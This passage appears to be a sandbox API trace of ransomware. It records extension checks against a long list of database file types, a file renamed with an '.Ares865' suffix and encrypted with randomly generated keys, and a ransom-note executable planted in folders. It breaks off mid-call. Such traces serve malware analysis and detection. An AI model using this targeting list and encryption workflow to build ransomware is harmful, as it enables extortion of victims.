1 [0076.268] lstrlenW (lpString="sqlitedb") returned 8 [0076.268] lstrcmpiW (lpString1="_x64.msi", lpString2="sqlitedb") returned -1 [0076.268] lstrlenW (lpString="xml") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0076.268] lstrlenW (lpString="$er") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0076.268] lstrlenW (lpString="4dd") returned 3 [0076.268] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0076.268] lstrlenW (lpString="4dl") returned 3 [0076.273] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0076.273] lstrlenW (lpString="^^^") returned 3 [0076.277] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0076.278] lstrlenW (lpString="abs") returned 3 [0076.278] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0076.278] lstrlenW (lpString="abx") returned 3 [0076.282] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0076.282] lstrlenW (lpString="accdb") returned 5 [0076.282] lstrcmpiW (lpString1="4.msi", lpString2="accdb") returned -1 [0076.282] lstrlenW (lpString="accdc") returned 5 [0076.282] lstrcmpiW (lpString1="4.msi", lpString2="accdc") returned -1 [0076.282] lstrlenW (lpString="accde") returned 5 [0076.282] lstrcmpiW (lpString1="4.msi", lpString2="accde") returned -1 [0076.283] lstrlenW (lpString="accdr") returned 5 [0076.286] lstrcmpiW (lpString1="4.msi", lpString2="accdr") returned -1 [0076.291] lstrlenW (lpString="accdt") returned 5 [0076.291] lstrcmpiW (lpString1="4.msi", lpString2="accdt") returned -1 [0076.291] lstrlenW (lpString="accdw") returned 5 [0076.291] lstrcmpiW (lpString1="4.msi", lpString2="accdw") returned -1 [0076.293] lstrlenW (lpString="accft") returned 5 [0076.293] lstrcmpiW (lpString1="4.msi", lpString2="accft") returned -1 [0076.293] lstrlenW (lpString="adb") returned 3 [0076.295] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0076.295] lstrlenW (lpString="adb") returned 3 [0076.295] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0076.296] lstrlenW (lpString="ade") returned 3 [0076.296] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0076.296] lstrlenW (lpString="adf") returned 3 [0076.297] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0076.298] lstrlenW (lpString="adn") returned 3 [0076.298] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0076.298] lstrlenW (lpString="adp") returned 3 [0076.299] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0076.299] lstrlenW (lpString="alf") returned 3 [0076.299] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0076.300] lstrlenW (lpString="ask") returned 3 [0076.300] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0076.300] lstrlenW (lpString="btr") returned 3 [0076.301] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0076.301] lstrlenW (lpString="cat") returned 3 [0076.302] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0076.302] lstrlenW (lpString="cdb") returned 3 [0076.303] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0076.304] lstrlenW (lpString="ckp") returned 3 [0076.304] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0076.304] lstrlenW (lpString="cma") returned 3 [0076.305] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0076.305] lstrlenW (lpString="cpd") returned 3 [0076.305] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0076.305] lstrlenW (lpString="dacpac") returned 6 [0076.306] lstrcmpiW (lpString1="64.msi", lpString2="dacpac") returned -1 [0076.307] lstrlenW (lpString="dad") returned 3 [0076.308] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0076.309] lstrlenW (lpString="dadiagrams") returned 10 [0076.309] lstrcmpiW (lpString1="um_x64.msi", lpString2="dadiagrams") returned 1 [0076.310] lstrlenW (lpString="daschema") returned 8 [0076.328] lstrcmpiW (lpString1="_x64.msi", lpString2="daschema") returned -1 [0076.329] lstrlenW (lpString="db-journal") returned 10 [0076.329] lstrcmpiW (lpString1="um_x64.msi", lpString2="db-journal") returned 1 [0076.333] lstrlenW (lpString="db-shm") returned 6 [0076.333] lstrcmpiW (lpString1="64.msi", lpString2="db-shm") returned -1 [0076.334] lstrlenW (lpString="db-wal") returned 6 [0076.334] lstrcmpiW (lpString1="64.msi", lpString2="db-wal") returned -1 [0076.334] lstrlenW (lpString="dbc") returned 3 [0076.334] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0076.334] lstrlenW (lpString="dbs") returned 3 [0076.335] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0076.335] lstrlenW (lpString="dbt") returned 3 [0076.339] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0076.357] lstrlenW (lpString="dbv") returned 3 [0076.364] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0076.364] lstrlenW (lpString="dbx") returned 3 [0076.364] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0076.370] lstrlenW (lpString="dcb") returned 3 [0076.370] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0076.370] lstrlenW (lpString="dct") returned 3 [0076.370] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0076.370] lstrlenW (lpString="dcx") returned 3 [0076.370] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0076.373] lstrlenW (lpString="ddl") returned 3 [0076.374] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0076.374] lstrlenW (lpString="dlis") returned 4 [0076.374] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0076.374] lstrlenW (lpString="dp1") returned 3 [0076.374] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0076.374] lstrlenW (lpString="dqy") returned 3 [0076.374] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0076.381] lstrlenW (lpString="dsk") returned 3 [0076.381] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0076.381] lstrlenW (lpString="dsn") returned 3 [0076.381] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0076.381] lstrlenW (lpString="dtsx") returned 4 [0076.381] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0076.381] lstrlenW (lpString="dxl") returned 3 [0076.381] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0076.381] lstrlenW (lpString="eco") returned 3 [0076.381] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0076.381] lstrlenW (lpString="ecx") returned 3 [0076.382] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0076.382] lstrlenW (lpString="edb") returned 3 [0076.382] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0076.382] lstrlenW (lpString="epim") returned 4 [0076.382] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0076.384] lstrlenW (lpString="fcd") returned 3 [0076.387] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0076.390] lstrlenW (lpString="fdb") returned 3 [0076.390] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0076.390] lstrlenW (lpString="fic") returned 3 [0076.394] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0076.394] lstrlenW (lpString="flexolibrary") returned 12 [0076.395] lstrcmpiW (lpString1="imum_x64.msi", lpString2="flexolibrary") returned 1 [0076.397] lstrlenW (lpString="fm5") returned 3 [0076.397] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0076.398] lstrlenW (lpString="fmp") returned 3 [0076.398] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0076.398] lstrlenW (lpString="fmp12") returned 5 [0076.402] lstrcmpiW (lpString1="4.msi", lpString2="fmp12") returned -1 [0076.403] lstrlenW (lpString="fmpsl") returned 5 [0076.403] lstrcmpiW (lpString1="4.msi", lpString2="fmpsl") returned -1 [0076.404] lstrlenW (lpString="fol") returned 3 [0076.404] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0076.408] lstrlenW (lpString="fp3") returned 3 [0076.416] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0076.416] lstrlenW (lpString="fp4") returned 3 [0076.416] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0076.416] lstrlenW (lpString="fp5") returned 3 [0076.416] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0076.421] lstrlenW (lpString="fp7") returned 3 [0076.421] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0076.422] lstrlenW (lpString="fpt") returned 3 [0076.426] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0076.427] lstrlenW (lpString="frm") returned 3 [0076.448] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0076.457] lstrlenW (lpString="gdb") returned 3 [0076.457] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0076.457] lstrlenW (lpString="gdb") returned 3 [0076.457] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0076.460] lstrlenW (lpString="grdb") returned 4 [0076.460] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0076.460] lstrlenW (lpString="gwi") returned 3 [0076.460] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0076.460] lstrlenW (lpString="hdb") returned 3 [0076.460] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0076.460] lstrlenW (lpString="his") returned 3 [0076.460] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0076.460] lstrlenW (lpString="ib") returned 2 [0076.461] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0076.461] lstrlenW (lpString="idb") returned 3 [0076.461] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0076.461] lstrlenW (lpString="ihx") returned 3 [0076.461] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0076.461] lstrlenW (lpString="itdb") returned 4 [0076.461] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0076.461] lstrlenW (lpString="itw") returned 3 [0076.462] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0076.462] lstrlenW (lpString="jet") returned 3 [0076.462] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0076.462] lstrlenW (lpString="jtx") returned 3 [0076.462] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0076.462] lstrlenW (lpString="kdb") returned 3 [0076.462] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0076.462] lstrlenW (lpString="kexi") returned 4 [0076.462] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0076.462] lstrlenW (lpString="kexic") returned 5 [0076.462] lstrcmpiW (lpString1="4.msi", lpString2="kexic") returned -1 [0076.462] lstrlenW (lpString="kexis") returned 5 [0076.462] lstrcmpiW (lpString1="4.msi", lpString2="kexis") returned -1 [0076.462] lstrlenW (lpString="lgc") returned 3 [0076.462] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0076.463] lstrlenW (lpString="lwx") returned 3 [0076.463] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0076.463] lstrlenW (lpString="maf") returned 3 [0076.463] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0076.463] lstrlenW (lpString="maq") returned 3 [0076.463] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0076.463] lstrlenW (lpString="mar") returned 3 [0076.463] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0076.463] lstrlenW (lpString="marshal") returned 7 [0076.463] lstrcmpiW (lpString1="x64.msi", lpString2="marshal") returned 1 [0076.463] lstrlenW (lpString="mas") returned 3 [0076.463] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0076.463] lstrlenW (lpString="mav") returned 3 [0076.463] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0076.463] lstrlenW (lpString="maw") returned 3 [0076.463] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0076.463] lstrlenW (lpString="mdbhtml") returned 7 [0076.464] lstrcmpiW (lpString1="x64.msi", lpString2="mdbhtml") returned 1 [0076.464] lstrlenW (lpString="mdn") returned 3 [0076.464] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0076.464] lstrlenW (lpString="mdt") returned 3 [0076.464] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0076.464] lstrlenW (lpString="mfd") returned 3 [0076.464] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0076.464] lstrlenW (lpString="mpd") returned 3 [0076.464] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0076.464] lstrlenW (lpString="mrg") returned 3 [0076.464] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0076.464] lstrlenW (lpString="mud") returned 3 [0076.465] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0076.465] lstrlenW (lpString="mwb") returned 3 [0076.466] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0076.466] lstrlenW (lpString="myd") returned 3 [0076.466] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0076.466] lstrlenW (lpString="ndf") returned 3 [0076.467] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0076.467] lstrlenW (lpString="nnt") returned 3 [0076.467] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0076.468] lstrlenW (lpString="nrmlib") returned 6 [0076.468] lstrcmpiW (lpString1="64.msi", lpString2="nrmlib") returned -1 [0076.468] lstrlenW (lpString="ns2") returned 3 [0076.469] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0076.469] lstrlenW (lpString="ns3") returned 3 [0076.469] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0076.470] lstrlenW (lpString="ns4") returned 3 [0076.470] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0076.473] lstrlenW (lpString="nsf") returned 3 [0076.473] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0076.474] lstrlenW (lpString="nv") returned 2 [0076.475] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0076.475] lstrlenW (lpString="nv2") returned 3 [0076.476] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0076.476] lstrlenW (lpString="nwdb") returned 4 [0076.476] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0076.477] lstrlenW (lpString="nyf") returned 3 [0076.477] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0076.477] lstrlenW (lpString="odb") returned 3 [0076.478] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0076.478] lstrlenW (lpString="odb") returned 3 [0076.479] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0076.479] lstrlenW (lpString="oqy") returned 3 [0076.479] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0076.479] lstrlenW (lpString="ora") returned 3 [0076.480] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0076.480] lstrlenW (lpString="orx") returned 3 [0076.480] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0076.480] lstrlenW (lpString="owc") returned 3 [0076.480] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0076.481] lstrlenW (lpString="p96") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0076.481] lstrlenW (lpString="p97") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0076.481] lstrlenW (lpString="pan") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0076.481] lstrlenW (lpString="pdb") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0076.481] lstrlenW (lpString="pdm") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0076.481] lstrlenW (lpString="pnz") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0076.481] lstrlenW (lpString="qry") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0076.481] lstrlenW (lpString="qvd") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0076.481] lstrlenW (lpString="rbf") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0076.481] lstrlenW (lpString="rctd") returned 4 [0076.481] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0076.481] lstrlenW (lpString="rod") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0076.481] lstrlenW (lpString="rodx") returned 4 [0076.481] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0076.481] lstrlenW (lpString="rpd") returned 3 [0076.481] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0076.482] lstrlenW (lpString="rsd") returned 3 [0076.482] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0076.482] lstrlenW (lpString="sas7bdat") returned 8 [0076.482] lstrcmpiW (lpString1="_x64.msi", lpString2="sas7bdat") returned -1 [0076.483] lstrlenW (lpString="sbf") returned 3 [0076.484] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0076.484] lstrlenW (lpString="scx") returned 3 [0076.484] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0076.485] lstrlenW (lpString="sdb") returned 3 [0076.486] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0076.487] lstrlenW (lpString="sdc") returned 3 [0076.487] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0076.509] lstrlenW (lpString="sdf") returned 3 [0076.509] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0076.509] lstrlenW (lpString="sis") returned 3 [0076.510] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0076.510] lstrlenW (lpString="spq") returned 3 [0076.511] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0076.511] lstrlenW (lpString="te") returned 2 [0076.511] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0076.511] lstrlenW (lpString="teacher") returned 7 [0076.511] lstrcmpiW (lpString1="x64.msi", lpString2="teacher") returned 1 [0076.511] lstrlenW (lpString="tmd") returned 3 [0076.511] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0076.511] lstrlenW (lpString="tps") returned 3 [0076.511] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0076.511] lstrlenW (lpString="trc") returned 3 [0076.511] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0076.511] lstrlenW (lpString="trc") returned 3 [0076.524] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0076.524] lstrlenW (lpString="trm") returned 3 [0076.524] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0076.525] lstrlenW (lpString="udb") returned 3 [0076.525] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0076.525] lstrlenW (lpString="udl") returned 3 [0076.525] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0076.525] lstrlenW (lpString="usr") returned 3 [0076.525] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0076.525] lstrlenW (lpString="v12") returned 3 [0076.525] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0076.529] lstrlenW (lpString="vis") returned 3 [0076.530] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0076.530] lstrlenW (lpString="vpd") returned 3 [0076.530] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0076.530] lstrlenW (lpString="vvv") returned 3 [0076.531] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0076.531] lstrlenW (lpString="wdb") returned 3 [0076.531] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0076.531] lstrlenW (lpString="wmdb") returned 4 [0076.531] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0076.531] lstrlenW (lpString="wrk") returned 3 [0076.531] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0076.531] lstrlenW (lpString="xdb") returned 3 [0076.533] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0076.533] lstrlenW (lpString="xld") returned 3 [0076.533] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0076.535] lstrlenW (lpString="xmlff") returned 5 [0076.535] lstrcmpiW (lpString1="4.msi", lpString2="xmlff") returned -1 [0076.535] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865") returned 148 [0076.539] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.ares865"), dwFlags=0x1) returned 1 [0076.572] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0076.572] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143360) returned 1 [0076.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0076.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0076.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0076.573] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0076.573] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0076.573] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0076.573] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23300, lpName=0x0) returned 0x154 [0076.575] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23300) returned 0x420000 [0076.583] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0076.584] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0076.584] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0076.584] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0076.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0076.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0076.584] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0076.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0076.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0076.584] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0076.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0076.585] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0076.585] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0076.586] CloseHandle (hObject=0x154) returned 1 [0076.586] CloseHandle (hObject=0x12c) returned 1 [0076.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0076.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0076.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0076.587] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0076.587] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0076.587] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2528 [0076.587] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0076.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2a80 | out: hHeap=0x2b0000) returned 1 [0076.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0076.587] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 82 [0076.587] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0076.587] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.587] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0076.588] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.588] GetLastError () returned 0x0 [0076.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0076.588] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0076.588] CloseHandle (hObject=0x120) returned 1 [0076.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: 